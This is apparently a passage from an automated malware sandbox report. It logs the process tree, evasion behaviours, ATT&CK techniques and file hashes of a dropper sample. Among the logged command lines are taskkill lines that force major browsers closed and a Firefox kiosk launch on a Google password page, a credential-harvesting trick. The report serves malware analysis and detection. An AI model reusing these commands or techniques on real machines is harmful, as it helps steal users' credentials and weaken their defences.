C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1288
-
-
C:\Users\Admin\AppData\Local\Temp\1012208001\6284ef5aab.exe"C:\Users\Admin\AppData\Local\Temp\1012208001\6284ef5aab.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\1012209001\d235088e23.exe"C:\Users\Admin\AppData\Local\Temp\1012209001\d235088e23.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1920
-
-
C:\Users\Admin\AppData\Local\Temp\1012210001\30e19168b2.exe"C:\Users\Admin\AppData\Local\Temp\1012210001\30e19168b2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\1012211001\9e7a56c139.exe"C:\Users\Admin\AppData\Local\Temp\1012211001\9e7a56c139.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3736 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab8d6a7-14cd-4bfe-b988-c85750dc6bd8} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" gpu6⤵PID:4788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beb97e41-0673-4405-bbd8-ee04875ea39e} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" socket6⤵PID:3728
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 2836 -prefMapHandle 3176 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e4b1c85-6e52-4592-9521-e245098c5075} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab6⤵PID:4124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3920 -childID 2 -isForBrowser -prefsHandle 3912 -prefMapHandle 3828 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97eb77ad-b665-4e88-a54f-cc495a65030b} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab6⤵PID:4960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4652 -prefMapHandle 2768 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56323263-91c1-4987-93cd-46498dea3a2d} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" utility6⤵
- Checks processor information in registry
PID:3868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5436 -childID 3 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80f1b825-8087-482a-b5cb-503ea4e45225} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab6⤵PID:5204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a74226d0-c621-4f54-90e3-05ebb2465a8f} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab6⤵PID:5312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5276 -childID 5 -isForBrowser -prefsHandle 5864 -prefMapHandle 5868 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2509572-581a-419e-9806-5217a4b9225a} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" tab6⤵PID:5320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012212001\0fba2c100f.exe"C:\Users\Admin\AppData\Local\Temp\1012212001\0fba2c100f.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Users\Admin\AppData\Local\Temp\1012213001\40673ab59a.exe"C:\Users\Admin\AppData\Local\Temp\1012213001\40673ab59a.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\1012214001\rhnew.exe"C:\Users\Admin\AppData\Local\Temp\1012214001\rhnew.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 15564⤵
- Program crash
PID:5632
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1596 -ip 15961⤵PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1596 -ip 15961⤵PID:3540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1596 -ip 15961⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5920 -ip 59201⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6112
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\activity-stream.discovery_stream.json
Filesize27KB
MD5ff049567661401e60903a4b58f59f245
SHA178c5d4f62b6fbb39cd9aa1319e2e55abbe672eba
SHA25635ed85ebd7ace4eeca074671583cf0b5f6134590e7ce816bb0c93a8e344dc71c
SHA512ebaed10cb12160432ebe7f4bbe1c4048d185ecaad105fe2258854cbb7c17375e25a6b441336e76be0c72fee041ffe9c75047c9a27c7d3ade31923cb5b035012b
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
Filesize13KB
MD56d574a42102d7270db089684591f5206
SHA15e31557f4cdb4dc8fcf01136449d420e59c9e584
SHA2565fcad3087cf28cf8ab37d61a6b6102a162f0017cf33c562256a9848e1ea2abcc
SHA5124688c01c1cf472cec1ae6f4c27af817331738b8292876d7110c6760dcd514e2c1a28f2c917df511eeec52927f589665b1a1612cb68a78765cf2f842339f557f1
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7fmsgkth.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.8MB
MD55fa72774e9d750628857a68d84275833
SHA17eebff7d14817544cc11829e354c1dfc7f603628
SHA256a170fa6fefc8b753ef0f88384b906ca2338365d8552012ed7aa1c0c8c7cb5a56
SHA5129ac2715f35e107effef9f4526e6430271ca141bc5a729993e88dfa50eb20f61b15502c54f64e9596cd9bb449a1bb25c1cc98f1d12d857afdda742cdce3280838
-
Filesize
5.6MB
MD523b25ce90f70ffa0435db8df6a6764f2
SHA172d0c052f26309704f13c090495c3cdea4ed1bf2
SHA2569165705656ffe7608922ff366357e3b98b0e5ece8c6d39780874c7b4bd7b2dd3
SHA512b6c81131119b95df9d789329ffd4553c1624f7d9e38c46924ac4838e59ccb59b538646f36d8c80b9361412842f8c0328aa4177e93e72e22c15077669ee9904ec
-
Filesize
612B
MD5e3eb0a1df437f3f97a64aca5952c8ea0
SHA17dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA25638ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA51243573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf
-
Filesize
1.7MB
MD5ff4cf493ac5f7663d1cfc243e6646eb7
SHA1ff7184eae695580f1e86fac340925c7f01f4de6d
SHA25672a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748
SHA5121eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b
-
Filesize
1.8MB
MD506b66556e8a2389c099c0da6e0db3dd2
SHA153f96909c6ae94499b790eba12ec355a275388df
SHA256ccd13fcd2302d16a0fd2d9cc2653869ce0551d464145bf264f75163f03f874bc
SHA5128623c835b552b000749405788eba8cc221f505d5285ff5fe8c5d79d81ae5d9a18985427e1f98c4baf2defd38ece14af11683524de636612d69d9b913a6869ce5
-
Filesize
1.8MB
MD5b12e16778fc59591c0be9a05f177bdae
SHA13809bacf7fa357579a7d0f81d036d7fc5e482dd6
SHA256675290c045ad958ec71e15c3134b41c1e4aa8be8475b4ad46b8d4a323936d750
SHA512362f2f7121cd21ecc4fc590dca11a70cc8ba7633d36d1b38fffc6a1cb9d4ad06ea9aa1c7984853bd49e9116d53e6db39aedd741f14335e587e8dce87cfa236bf
-
Filesize
1.7MB
MD5da71401999308f3006e292a28a953516
SHA19a8470f97760506d8fe83c0e0398f9b37c857b2f
SHA256e1bdbadb3c03238af26c510775bb0aa63f7221dd43eb6f02a16332e091718779
SHA5124fd76deffcca140a1d1138386b1f2b87853686660b4ff4c17e80505ecec1f6742c552636a17bdfc3a3aef24d359c376dfef13c14dd0005bc94d1f521e3aa7df4
-
Filesize
948KB
MD5a1c0ae9c47dfa39f9f4ecb25a8ed6df3
SHA162a0861c8a57f4afcd49d4db7ad3a46897b10e1e
SHA256200baf4c343c7bee6e39a39097fda685d33ba525ee1d7045ccafb97b3a22d1a7
SHA5129f13e3774584e6af8cfc7788befc49715bbda6050b1df8675eb8e9b648f38a3a463760f691a6ff639542e5e70d8406f8060d86636e85d596cd883fbc2f614879
-
Filesize
2.6MB
MD56497aafc301bd0c3313acb178dd5b328
SHA15d13e25e93ed6b09b8d9ee87449915b7b5352ec3
SHA256fe5929f96b7aa3c446141156ec7456d560a7a8b576d55bc7fbbd6b4c1201cf8a
SHA51239080221d3740f629691c11174debd1cbeaa4fbafc1bd912b9ecdea9079cf3e8a24e9fecb34c7533e89c3258bc37079f635b665714dc92d2a7e28ad3cda74745
-
Filesize
4.2MB
MD588bf63a8e16a403ede877c51371debe2
SHA104dfbf773b963149cfbe1787bae7a3c8a5bd1f34
SHA2566da015a4d07aaa513f90f351e52f6789345826bf255e5ea616b2bfded6ed4477
SHA512886629e4f4d041cba51659885ad27451f4103cf1c556de21439b52b362b6f03a046b1c245a6b2259d6726fbf9db9f0ea1fee72dde86303fe7aec8a597dd6da9f
-
Filesize
1.8MB
MD5f7286fef9317fe91e24cda721ec0be81
SHA10e0197c0f87200f7c1ebb4bba314f7bb875a638c
SHA2564dcf1cc20990dace1f3e7c5a4b94ea7b823f90eb6de639b2b1b6494838f1cc62
SHA512314b3f5cf1a0c15db568d33647b97887b37e987ba253ee9f5ded045446328307ebd04acd832fbdf66ad29be9510bd0c378e2fcb889509dca84df9b9106602c6e
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1.8MB
MD57b92d16653d665a34de4c92d58e583df
SHA13023e4305423e69cabf82b2e0ba20d87cf67cd85
SHA25616ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12
SHA5126efb2fa816fe7bb92e91233756781ffed7d72594d4ae927e0ea3fcb61744e9bd7dfe626c6e64445d0797815748765032b44d9ab1a3c6f22e46dd86cda5098a03
-
Filesize
285B
MD59a403b56da0e8c8703a1d977de6342ed
SHA13bd01f416cd478d2af6dc7870fde50dec0835cd6
SHA256bed559d08ee93474d7324718acf9a348cd70cb92baab355f854999288e12a724
SHA512082772926b919dd10f168449c94bb954f035d1279d2857f6eb10e0adeda19a155bd30257d29f793e401775bd64f6092d046d99f833fcebb3759216b3362082bc
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\AlternateServices.bin
Filesize10KB
MD5ead00978888b8d0e2627d1da4d79f65e
SHA178444d0aa77e15ecaa2202b18ce0f78817146fab
SHA25617dd7dcf318635041b25129f5834c224d5abc300969fa77fdc5057d5fa573389
SHA5127444a5a9ff25d631a2ae86238d9a547827eca602489f28da48d4740a352db347f1737ff56d5f3c425fb7a4c0d0eff534af9f7f3bdb25fe52e3280cc8fa60b4a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD543ff5b07a2d347d1f92fa32ac02f969c
SHA17eb4ff3764270feb45ee9308335a1a81d41432cc
SHA256d22159322f94286f55d59863a9cd4f634a22fc1490772a98ac2dc7ab92b5ae31
SHA512864b23c3f978c27cddb18efb115461c2857c4d5540dd7dd21c0b52375ee8de879cbafa1bc2059454f7443a252eae20e9832e08e76f65eed8d644233ca4f145a5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5930860de2f611a78e2e0be8f9a93bfea
SHA1639b488a1c8b7578cfec8b2d681c8a15449545a8
SHA2563aaa0f819a0a8740302c72dc6058fe66149e17773ad0b4ab4c1026fc4aa93c1e
SHA512ac7730c701fcfd5eb8dc7c263730bbfde3c198ace8beda144ff512387ec067f1b7daf3597d6fd41ded11de2c2902b293a529c18a209dd7572607d41a47810376
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD52019f4a38fd8134b1789ff40be2b8be0
SHA14b317d7b9bf4ba009f7de13f7a5b47f70c6eb272
SHA256b96bb21f97cb6ddf33af7ad9f949d2f4bdf9834fd8a461ba792c6eaf81bb17ea
SHA51286a619252844d62da2c1825a653b27022f76d5741d12a4778d9c89d90e44e8d72dfac528ffd9855f551e6817bbd018d4ed8e6bf18c7d263b480c08310d908193
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD546785b5a561e92c11e981c5028e45b84
SHA13816eb8fbccaab26550a8ec76cd359c71c725644
SHA256fd321d9acce4eb888cf6011ce97d4e01f850925320229bddfe9ef972df24a056
SHA512db7f78d4f95eee25c1904d35e3b46a0c275ba9469297d6a3d6821204f58e2072d74408f95a5f775d78176067799891539a04489be6bee26b552902b9176f48b7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize23KB
MD5a07305dd7efe61c76b0e54c459411b41
SHA1b22604d2ff643e7cd3f909b15f29f9f087c29fbe
SHA256d45a6ac90f3e849007d5ed1167e46db67d45d3a8491c682d404fa1143db7678d
SHA512cfccd8480f0247cf9b77b25738613df1b0b07090bc687483a5970327f516fb5f5839e37ec4266f15e9fc055cb871c437712c2eb9c7a1be120a8b86c6399cc5d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\c8a6973b-a1e4-47d7-81c4-73ff2f5e2024
Filesize982B
MD5000d1794feb67d9b9eb906ef3e8e9a5f
SHA112d8a11bc20366c4f82e41b2e6bab0abadab1f48
SHA256800be057d6973a51540dee0838e1f29e8420907dea01d61358375ece546e90b7
SHA51279704f2c73b6b55bc1a8a793917de66ae07ce45214a9c47449f36036fdf680acc1530dab4d2e41340977d40511bf73fa585c5987434e52ee8efda73d3632ca71
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\fcd523d5-e350-49c7-b4d9-feccfc921035
Filesize659B
MD57093b93fe2310a924813927abecdea4d
SHA1e20934b199ee68d37b660e85f01a65b969443a78
SHA256d52a3429d4c48a2d4cd15337907fc7a5ee6e0dfeafb66080992b3eb95736c7f5
SHA5126f8455de05e218f3279b4b3a7c669a40cd6bed148c3e27ece7ec4a7c041b55ec86a2f97f0ac1ca7aa91d6185f0d1206ba3d2dffab24e41ae3572839e741a17fc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD576a74e49e915ebeaee7fd5c536f621e9
SHA1afceca1f239f8292eed1ff751016608da0d69db3
SHA256c36886713e59278ed3cb59116f11dc01c9c1ae61a68d90a6583b08d487090de2
SHA5129daa93a9b7b15520291acd2a85e68f9fd5f3fdf76641328fb3e7bfe718b0199a8d52bbb1f944e95ffa71db8caf2aedce658e3cc00b800a87b2102b1f15ac0bf3
-
Filesize
15KB
MD5c76756a402ed20894d393456ff0be714
SHA196869cb323767e81c217947fe23be64fd6c6e7c7
SHA2568f55003e6030ea8ede435dc3a07ac923e1e487e9fd109665d3c16813d2e1f771
SHA512062e7ef0ab9eb6fbf8544973823a04e4c084a07af5264d9653c6bdaba849ff784bcacd414a6e99a7f7218ca1c7cd1df3103c878ec69170c73270f0cfc1921041
-
Filesize
10KB
MD525c2314f4d11a7628aadcbea47d404de
SHA14640b95c5552b2aaf2f896295b6a6faa566691db
SHA256aebeb7e21c2661b0241423efadd1b73f9cc6357925ce337761ff0bff82a21933
SHA5122ffca1dbbaf9f070bb984b0c15919bfbff22eb5bf5e9054cae527c255be937d642ea99b887fdd9ca576275674672bc6a479dc71939f3b7352e879d4f319fbe95
-
Filesize
10KB
MD5cbdf3cf105f8f997e2805deb60a1d3e4
SHA15c21438a82fa7c94305c488c24bba78f6efcec9c
SHA25639b3fbf1765eea99da7fde117b873214403e423424b74be31291228955f81341
SHA512230aa4998b77069a39e88334041a205f893139cb5cec41c463ca97f8d197e84b2836bfd9589e3c900335e4ffd52169a92da48884bddcc10fd9b5a583eb5f94c2